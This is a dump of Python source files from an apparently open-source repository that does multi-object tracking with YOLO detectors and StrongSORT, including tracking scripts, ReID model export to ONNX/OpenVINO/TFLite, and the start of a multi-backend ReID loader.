line = ( int(p.stem), frame_idx, id , cls, *xywh, conf) if save_conf else ( p.stem, frame_idx, cls, *xywh) # label format
with open(txt_path + '.txt', 'a') as file:
file.write(('%g ' * len(line) + '\n') % line)
if save_img or save_crop or view_img: # Add bbox to image
c = int(cls) # integer class
label = None if hide_labels else (names[c] if hide_conf else f' { id } {names[c]} {conf:.2f}')
plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=2)
if save_crop:
save_one_box(xyxy, imc, file=save_dir / 'crops' / names[c] / f'{p.stem}.jpg', BGR=True)
# # draw boxes for visualization
# if len(outputs[i]) > 0:
# for j, (output, conf) in enumerate(zip(outputs[i], confs)):
# bboxes = output[0:4]
# id = output[4]
# cls = output[5]
# if save_txt:
# # to MOT format
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # format video_name frame id xmin ymin width height score class
# with open(txt_path + '.txt', 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# if save_img or save_crop or view_img: # Add bbox to image
# c = int(cls) # integer class
# id = int(id) # integer id
# label = None if hide_labels else (names[c] if hide_conf else f'{names[c]} {conf:.2f}')
# plot_one_box(bboxes, im0, label=label, color=colors[int(cls)], line_thickness=2)
# if save_crop:
# txt_file_name = txt_file_name if (isinstance(path, list) and len(path) > 1) else ''
# save_one_box(bboxes, imc, file=save_dir / 'crops' / txt_file_name / names[c] / f'{id}' / f'{p.stem}.jpg', BGR=True)
print(f'{s}Done. YOLO:({t3 - t2:.3f}s), StrongSORT:({t5 - t4:.3f}s)')
else:
strongsort_list[i].increment_ages()
print('No detections')
# Stream results
im0 = annotator.result()
if view_img:
if platform.system() == 'Linux' and p not in windows:
windows.append(p)
cv2.namedWindow(str(p), cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux)
cv2.resizeWindow(str(p), im0.shape[1], im0.shape[0])
cv2.imshow(str(p), im0)
cv2.waitKey(1) # 1 millisecond
# Save results (image with detections)
if save_img:
if dataset.mode == 'image':
cv2.imwrite(save_path, im0)
else: # 'video' or 'stream'
if vid_path[i] != save_path: # new video
vid_path[i] = save_path
if isinstance(vid_writer[i], cv2.VideoWriter):
vid_writer[i].release() # release previous video writer
if vid_cap: # video
fps = vid_cap.get(cv2.CAP_PROP_FPS)
w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: # stream
fps, w, h = 30, im0.shape[1], im0.shape[0]
save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
vid_writer[i].write(im0)
prev_frames[i] = curr_frames[i]
# Print time (inference-only)
LOGGER.info(f"{s}{'' if len(det) else '(no detections), '}{dt[1].dt * 1E3:.1f}ms")
# Print results
LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape, %.1fms StrongSORT' % tuple(1E3 * x / seen for x in sdt))
if save_txt or save_img:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}")
if update:
strip_optimizer(yolo_weights[0]) # update model (to fix SourceChangeWarning)
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--yolo-weights', nargs='+', type=str, default=WEIGHTS / 'yolov9.pt', help='model.pt path(s)')
parser.add_argument('--strong-sort-weights', type=str, default=WEIGHTS / 'osnet_x0_25_msmt17.pt')
parser.add_argument('--config-strongsort', type=str, default='strong_sort/configs/strong_sort.yaml')
parser.add_argument('--source', type=str, default='0', help='file/dir/URL/glob, 0 for webcam')
parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='(optional) dataset.yaml path')
parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w')
parser.add_argument('--conf-thres', type=float, default=0.5, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.5, help='NMS IoU threshold')
parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--view-img', action='store_true', help='show results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes')
parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
# class 0 is person, 1 is bycicle, 2 is car... 79 is oven
parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--visualize', action='store_true', help='visualize features')
parser.add_argument('--update', action='store_true', help='update all models')
parser.add_argument('--project', default=ROOT / 'runs/track', help='save results to project/name')
parser.add_argument('--name', default='exp', help='save results to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)')
parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels')
parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--vid-stride', type=int, default=1, help='video frame-rate stride')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand
return opt
def main(opt):
# check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
run(**vars(opt))
if __name__ == "__main__":
opt = parse_opt()
main(opt)
| 19,587 | Python | .py | 336 | 47.229167 | 150 | 0.577998 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,107 | reid_export.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/reid_export.py | import torch
import argparse
import sys
import os
from pathlib import Path
import subprocess
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0].parents[0] # yolov5 strongsort root directory
WEIGHTS = ROOT / 'weights'
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov5') not in sys.path:
sys.path.append(str(ROOT / 'yolov5/')) # add yolov5 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
sys.path.append(str(ROOT / 'strong_sort/')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from yolov7.utils.general import colorstr
from yolov7.utils.add_nms import LOGGER
from strong_sort.deep.reid.torchreid.utils.feature_extractor import FeatureExtractor
from strong_sort.deep.reid.torchreid.models import build_model
from strong_sort.deep.reid_model_factory import get_model_name
def file_size(path):
# Return file/dir size (MB)
path = Path(path)
if path.is_file():
return path.stat().st_size / 1E6
elif path.is_dir():
return sum(f.stat().st_size for f in path.glob('**/*') if f.is_file()) / 1E6
else:
return 0.0
def export_onnx(model, im, file, opset, train=False, dynamic=True, simplify=False):
# ONNX export
try:
import onnx
f = file.with_suffix('.onnx')
LOGGER.info(f'\nstarting export with onnx {onnx.__version__}...')
torch.onnx.export(
model.cpu() if dynamic else model, # --dynamic only compatible with cpu
im.cpu() if dynamic else im,
f,
verbose=False,
opset_version=opset,
training=torch.onnx.TrainingMode.TRAINING if train else torch.onnx.TrainingMode.EVAL,
do_constant_folding=not train,
input_names=['images'],
output_names=['output'],
dynamic_axes={
'images': {
0: 'batch',
}, # shape(x,3,256,128)
'output': {
0: 'batch',
} # shape(x,2048)
} if dynamic else None
)
# Checks
model_onnx = onnx.load(f) # load onnx model
onnx.checker.check_model(model_onnx) # check onnx model
onnx.save(model_onnx, f)
# Simplify
if simplify:
try:
import onnxsim
LOGGER.info(f'simplifying with onnx-simplifier {onnxsim.__version__}...')
model_onnx, check = onnxsim.simplify(
model_onnx,
dynamic_input_shape=dynamic,
input_shapes={'t0': list(im.shape)} if dynamic else None)
assert check, 'assert check failed'
onnx.save(model_onnx, f)
except Exception as e:
LOGGER.info(f'simplifier failure: {e}')
LOGGER.info(f'export success, saved as {f} ({file_size(f):.1f} MB)')
LOGGER.info(f"run --dynamic ONNX model inference with: 'python detect.py --weights {f}'")
except Exception as e:
LOGGER.info(f'export failure: {e}')
return f
def export_openvino(file, dynamic, half, prefix=colorstr('OpenVINO:')):
f = str(file).replace('.onnx', f'_openvino_model{os.sep}')
# YOLOv5 OpenVINO export
try:
#check_requirements(('openvino-dev',)) # requires openvino-dev: https://pypi.org/project/openvino-dev/
import openvino.inference_engine as ie
LOGGER.info(f'\n{prefix} starting export with openvino {ie.__version__}...')
f = str(file).replace('.onnx', f'_openvino_model{os.sep}')
dyn_shape = [-1,3,256,128] if dynamic else None
cmd = f"mo \
--input_model {file} \
--output_dir {f} \
--data_type {'FP16' if half else 'FP32'}"
if dyn_shape is not None:
cmd + f"--input_shape {dyn_shape}"
subprocess.check_output(cmd.split()) # export
LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)')
return f
except Exception as e:
LOGGER.info(f'\n{prefix} export failure: {e}')
return f
def export_tflite(file, half, prefix=colorstr('TFLite:')):
# YOLOv5 OpenVINO export
try:
#check_requirements(('openvino-dev',)) # requires openvino-dev: https://pypi.org/project/openvino-dev/
import openvino.inference_engine as ie
LOGGER.info(f'\n{prefix} starting export with openvino {ie.__version__}...')
output = Path(str(file).replace(f'_openvino_model{os.sep}', f'_tflite_model{os.sep}'))
f = (Path(str(file).replace(f'_openvino_model{os.sep}', f'_tflite_model{os.sep}')).parent).joinpath(list(Path(file).glob('*.xml'))[0])
cmd = f"openvino2tensorflow \
--model_path {f} \
--model_output_path {output} \
--output_pb \
--output_saved_model \
--output_no_quant_float32_tflite \
--output_dynamic_range_quant_tflite"
subprocess.check_output(cmd.split()) # export
LOGGER.info(f'{prefix} export success, results saved in {output} ({file_size(f):.1f} MB)')
return f
except Exception as e:
LOGGER.info(f'\n{prefix} export failure: {e}')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="CPHD train")
parser.add_argument(
"-d",
"--dynamic",
action="store_true",
help="dynamic model input",
)
parser.add_argument(
"-p",
"--weights",
type=Path,
default="/home/mikel.brostrom/Yolov5_StrongSORT_OSNet/osnet_x0_25_msmt17.pt",
help="Path to weights",
)
parser.add_argument(
"-hp",
"--half_precision",
action="store_true",
help="transform model to half precision",
)
parser.add_argument(
'--imgsz', '--img', '--img-size',
nargs='+',
type=int,
default=[256, 128],
help='image (h, w)'
)
args = parser.parse_args()
# Build model
extractor = FeatureExtractor(
# get rid of dataset information DeepSort model name
model_name=get_model_name(args.weights),
model_path=args.weights,
device=str('cpu')
)
im = torch.zeros(1, 3, args.imgsz[0], args.imgsz[1]).to('cpu') # image size(1,3,640,480) BCHW iDetection
f = export_onnx(extractor.model.eval(), im, args.weights, 12, train=False, dynamic=args.dynamic, simplify=True) # opset 12
f = export_openvino(f, dynamic=args.dynamic, half=False)
export_tflite(f, False)
| 6,643 | Python | .py | 158 | 33.202532 | 142 | 0.60234 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,108 | trackv8.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/trackv8.py | import argparse
import os
# limit the number of cpus used by high performance libraries
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["VECLIB_MAXIMUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
import glob
import os
import platform
import random
import re
import subprocess
import time
from pathlib import Path
import cv2
import numpy as np
import pandas as pd
import torch
import sys
import numpy as np
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
from numpy import random
from time import time
from ultralytics import YOLO
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # yolov5 strongsort root directory
WEIGHTS = ROOT / 'weights'
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov7') not in sys.path:
sys.path.append(str(ROOT / 'yolov7')) # add yolov5 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
sys.path.append(str(ROOT / 'strong_sort')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from ultralytics.utils.torch_utils import select_device, time_sync
from datasets import LoadImages, LoadStreams
from ultralytics.utils import colorstr
from ultralytics.utils.checks import check_file, check_requirements, check_imshow
from ultralytics.utils.ops import non_max_suppression, scale_coords
from ultralytics.utils.plotting import save_one_box
import cv2
from strong_sort.utils.parser import get_config
from strong_sort.strong_sort import StrongSORT
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB")
def increment_path(path, exist_ok=True, sep=''):
# Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc.
path = Path(path) # os-agnostic
if (path.exists() and exist_ok) or (not path.exists()):
return str(path)
else:
dirs = glob.glob(f"{path}{sep}*") # similar paths
matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs]
i = [int(m.groups()[0]) for m in matches if m] # indices
n = max(i) + 1 if i else 2 # increment number
return f"{path}{sep}{n}" # update path
def isdocker():
# Is environment a Docker container
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def emojis(str=''):
# Return platform-dependent emoji-safe version of string
return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str
def plot_one_box(x, img, color=None, label=None, line_thickness=3):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
@torch.no_grad()
def run(
source= '0',
yolo_weights=WEIGHTS / 'yolov8.pt', # model.pt path(s),
strong_sort_weights=WEIGHTS / 'osnet_x0_25_msmt17.pt', # model.pt path,
config_strongsort=ROOT / 'strong_sort/configs/strong_sort.yaml',
imgsz=(640, 640), # inference size (height, width)
conf_thres=0.25, # confidence threshold
iou_thres=0.45, # NMS IOU threshold
max_det=1000, # maximum detections per image
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
show_vid=False, # show results
save_txt=False, # save results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_crop=False, # save cropped prediction boxes
save_vid=False, # save confidences in --save-txt labels
nosave=False, # do not save images/videos
classes=None, # filter by class: --class 0, or --class 0 2 3
agnostic_nms=False, # class-agnostic NMS
augment=False, # augmented inference
visualize=False, # visualize features
update=False, # update all models
project=ROOT / 'runs/track', # save results to project/name
name='exp', # save results to project/name
exist_ok=False, # existing project/name ok, do not increment
line_thickness=3, # bounding box thickness (pixels)
hide_labels=False, # hide labels
hide_conf=False, # hide confidences
hide_class=False, # hide IDs
half=False, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
):
source = str(source)
save_img = not nosave and not source.endswith('.txt') # save inference images
is_file = Path(source).suffix[1:] in (VID_FORMATS)
is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://'))
webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file)
if is_url and is_file:
source = check_file(source) # download
# # Directories
if not isinstance(yolo_weights, list): # single yolo model
exp_name = yolo_weights.stem
elif type(yolo_weights) is list and len(yolo_weights) == 1: # single models after --yolo_weights
exp_name = Path(yolo_weights[0]).stem
yolo_weights = Path(yolo_weights[0])
else: # multiple models after --yolo_weights
exp_name = 'ensemble'
exp_name = name if name else exp_name + "_" + strong_sort_weights.stem
save_dir = increment_path(Path(project) / exp_name, exist_ok=exist_ok) # increment run
save_dir = Path(save_dir)
(save_dir / 'tracks' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# # Load model
device = select_device(device)
# WEIGHTS.mkdir(parents=True, exist_ok=True)
model = YOLO(yolo_weights).to(device) # load yolo
names, = model.names,
# stride = model.stride.max().cpu().numpy() # model stride
# imgsz = check_img_size(imgsz[0], s=stride) # check image size
# Dataloader
if webcam:
show_vid = check_imshow()
cudnn.benchmark = True # set True to speed up constant image size inference
dataset = LoadStreams(source, img_size=imgsz)
nr_sources = len(dataset.sources)
else:
dataset = LoadImages(source)
nr_sources = 1
vid_path, vid_writer, txt_path = [None] * nr_sources, [None] * nr_sources, [None] * nr_sources
# initialize StrongSORT
cfg = get_config()
cfg.merge_from_file(opt.config_strongsort)
# Create as many strong sort instances as there are video sources
strongsort_list = []
for i in range(nr_sources):
strongsort_list.append(
StrongSORT(
strong_sort_weights,
device,
half,
max_dist=cfg.STRONGSORT.MAX_DIST,
max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
max_age=cfg.STRONGSORT.MAX_AGE,
n_init=cfg.STRONGSORT.N_INIT,
nn_budget=cfg.STRONGSORT.NN_BUDGET,
mc_lambda=cfg.STRONGSORT.MC_LAMBDA,
ema_alpha=cfg.STRONGSORT.EMA_ALPHA,
)
)
strongsort_list[i].model.warmup()
outputs = [None] * nr_sources
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
# Run tracking
dt, seen = [0.0, 0.0, 0.0, 0.0], 0
curr_frames, prev_frames = [None] * nr_sources, [None] * nr_sources
# Initialize variables for FPS calculation
start_time = time()
frames_processed = 0
for frame_idx, (path, im, im0s, vid_cap) in enumerate(dataset):
if time() - start_time >= 1:
fps = frames_processed / (time() - start_time)
print(f'FPS: {fps:.2f}')
# Draw FPS on the frame
cv2.putText(im0, f'FPS: {fps:.2f}', (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
# Reset variables for the next FPS calculation interval
start_time = time()
frames_processed = 0
# Increment the number of frames processed
frames_processed += 1
s = ''
t1 = time_sync()
im = torch.from_numpy(im).to(device)
im = im.half() if half else im.float() # uint8 to fp16/32
im /= 255.0 # 0 - 255 to 0.0 - 1.0
if len(im.shape) == 3:
im = im[None] # expand for batch dim
t2 = time_sync()
dt[0] += t2 - t1
# Inference
visualize = increment_path(save_dir / Path(path[0]).stem, mkdir=True) if visualize else False
pred = model.predict(im, augment=augment, conf=conf_thres, iou=iou_thres,save_crop=save_crop,name=name, project=project,exist_ok=True)
t3 = time_sync()
dt[1] += t3 - t2
# Apply NMS
# pred = non_max_suppression(pred[0], conf_thres, iou_thres, classes, agnostic_nms)
dt[2] += time_sync() - t3
# Process detections
for i, det in enumerate(pred): # detections per image
# txt_file_name = p.stem if not webcam else p.stem + f'_{i}' # Differentiate text file names for multiple videos
# save_path = str(save_dir / p.stem) if not webcam else str(save_dir / p.stem) + f'_{i}' # Differentiate video save paths for multiple videos
seen += 1
if webcam: # nr_sources >= 1
p, im0, _ = path[i], im0s[i].copy(), dataset.count
p = Path(p) # to Path
s += f'{i}: '
txt_file_name = p.name
save_path = str(save_dir / p.name) + str(i) # im.jpg, vid.mp4, ...
else:
p, im0, _ = path, im0s.copy(), getattr(dataset, 'frame', 0)
p = Path(p) # to Path
# video file
if source.endswith(VID_FORMATS):
txt_file_name = p.stem
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
# folder with imgs
else:
txt_file_name = p.name.split('.')[0] # get folder name containing current img
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
curr_frames[i] = im0
txt_path = str(save_dir / 'tracks' / txt_file_name) # im.txt
s += '%gx%g ' % im.shape[2:] # print string
imc = im0.copy() if save_crop else im0 # for save_crop
if cfg.STRONGSORT.ECC: # camera motion compensation
strongsort_list[i].tracker.camera_update(prev_frames[i], curr_frames[i])
if det is not None and len(det):
# Rescale boxes from img_size to im0 size
# det[:, :4] = scale_coords(im.shape[2:], det[:, :4], im0.shape).round()
# Print results
# for c in det[:, -1].unique():
# n = (det[:, -1] == c).sum() # detections per class
# s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string
xywhs = det.boxes.xywh
confs = det.boxes.conf
clss = det.boxes.cls
# pass detections to strongsort
t4 = time_sync()
outputs[i] = strongsort_list[i].update(xywhs.cpu(), confs.cpu(), clss.cpu(), im0)
t5 = time_sync()
dt[3] += t5 - t4
# draw boxes for visualization
if len(outputs[i]) > 0:
for j, (output, conf) in enumerate(zip(outputs[i], confs)):
bboxes = output[0:4]
id = output[4]
cls = output[5]
# if save_txt:
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # Append index to differentiate text files for multiple videos
# txt_path = str(save_dir / 'tracks' / (txt_file_name + f'_{frame_idx}.txt'))
# with open(txt_path, 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# # Save results (image with detections)
# if save_vid:
# if vid_path[i] != save_path: # new video
# vid_path[i] = save_path
# if isinstance(vid_writer[i], cv2.VideoWriter):
# vid_writer[i].release() # release previous video writer
# if vid_cap: # video
# fps = vid_cap.get(cv2.CAP_PROP_FPS)
# w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
# h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
# else: # stream
# fps, w, h = 30, im0.shape[1], im0.shape[0]
# save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
# vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
# vid_writer[i].write(im0)
if save_txt:
# Append index to differentiate text files for multiple videos
bbox_left = output[0]
bbox_top = output[1]
bbox_w = output[2] - output[0]
bbox_h = output[3] - output[1]
# restart the frame index at 0 for each video
txt_path = str(save_dir / 'tracks' / (txt_file_name + f'_{i}.txt'))
with open(txt_path, 'a') as file:
file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# if save_txt:
# # to MOT format
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # format video_name frame id xmin ymin width height score class
# with open(txt_path + '.txt', 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
if save_vid or save_crop or show_vid: # Add bbox to image
c = int(cls) # integer class
id = int(id) # integer id
label = None if hide_labels else (f'{id} {names[c]}' if hide_conf else \
(f'{id} {conf:.2f}' if hide_class else f'{id} {names[c]} {conf:.2f}'))
plot_one_box(bboxes, im0, label=label, color=colors[int(cls)], line_thickness=2)
print(f'{s}Done. YOLO:({t3 - t2:.3f}s), StrongSORT:({t5 - t4:.3f}s)')
else:
strongsort_list[i].increment_ages()
print('No detections')
# Stream results
if show_vid:
cv2.imshow(str(p), im0)
cv2.waitKey(1) # 1 millisecond
# Save results (image with detections)
if save_vid:
if vid_path[i] != save_path: # new video
vid_path[i] = save_path
if isinstance(vid_writer[i], cv2.VideoWriter):
vid_writer[i].release() # release previous video writer
if vid_cap: # video
fps = vid_cap.get(cv2.CAP_PROP_FPS)
w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: # stream
fps, w, h = 30, im0.shape[1], im0.shape[0]
save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
vid_writer[i].write(im0)
prev_frames[i] = curr_frames[i]
# Print results
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS, %.1fms strong sort update per image at shape {(1, 3, imgsz, imgsz)}' % t)
if save_txt or save_vid:
s = f"\n{len(list(save_dir.glob('tracks/*.txt')))} tracks saved to {save_dir / 'tracks'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
if update:
strip_optimizer(yolo_weights) # update model (to fix SourceChangeWarning)
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--yolo-weights', nargs='+', type=str, default=WEIGHTS / 'yolov7.pt', help='model.pt path(s)')
parser.add_argument('--strong-sort-weights', type=str, default=WEIGHTS / 'osnet_x0_25_msmt17.pt')
parser.add_argument('--config-strongsort', type=str, default='strong_sort/configs/strong_sort.yaml')
parser.add_argument('--source', type=str, default='0', help='file/dir/URL/glob, 0 for webcam')
parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w')
parser.add_argument('--conf-thres', type=float, default=0.5, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.5, help='NMS IoU threshold')
parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--show-vid', action='store_true', help='display tracking video results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes')
parser.add_argument('--save-vid', action='store_true', help='save video tracking results')
parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
# class 0 is person, 1 is bycicle, 2 is car... 79 is oven
parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--visualize', action='store_true', help='visualize features')
parser.add_argument('--update', action='store_true', help='update all models')
parser.add_argument('--project', default=ROOT / 'runs/track', help='save results to project/name')
parser.add_argument('--name', default='exp', help='save results to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)')
parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels')
parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences')
parser.add_argument('--hide-class', default=False, action='store_true', help='hide IDs')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand
return opt
def main(opt):
check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
run(**vars(opt))
if __name__ == "__main__":
opt = parse_opt()
main(opt)
| 21,620 | Python | .py | 387 | 44.687339 | 154 | 0.572851 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,109 | reid_multibackend.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/reid_multibackend.py | import torch.nn as nn
import torch
from pathlib import Path
import numpy as np
import torchvision.transforms as transforms
import cv2
import pandas as pd
import gdown
from os.path import exists as file_exists
from .deep.reid_model_factory import show_downloadeable_models, get_model_url, get_model_name
from torchreid.reid.utils import FeatureExtractor
from torchreid.reid.utils.tools import download_url
def check_suffix(file='yolov5s.pt', suffix=('.pt',), msg=''):
# Check file(s) for acceptable suffix
if file and suffix:
if isinstance(suffix, str):
suffix = [suffix]
for f in file if isinstance(file, (list, tuple)) else [file]:
s = Path(f).suffix.lower() # file suffix
if len(s):
assert s in suffix, f"{msg}{f} acceptable suffix is {suffix}"
class ReIDDetectMultiBackend(nn.Module):
# ReID models MultiBackend class for python inference on various backends
def __init__(self, weights='osnet_x0_25_msmt17.pt', device=torch.device('cpu'), fp16=False):
super().__init__()
w = str(weights[0] if isinstance(weights, list) else weights)
self.pt, self.jit, self.onnx, self.xml, self.engine, self.coreml, \
self.saved_model, self.pb, self.tflite, self.edgetpu, self.tfjs = self.model_type(w) # get backend
if self.pt: # PyTorch
model_name = get_model_name(weights)
model_url = get_model_url(weights)
if not file_exists(weights) and model_url is not None:
gdown.download(model_url, str(weights), quiet=False)
elif file_exists(weights):
pass
elif model_url is None:
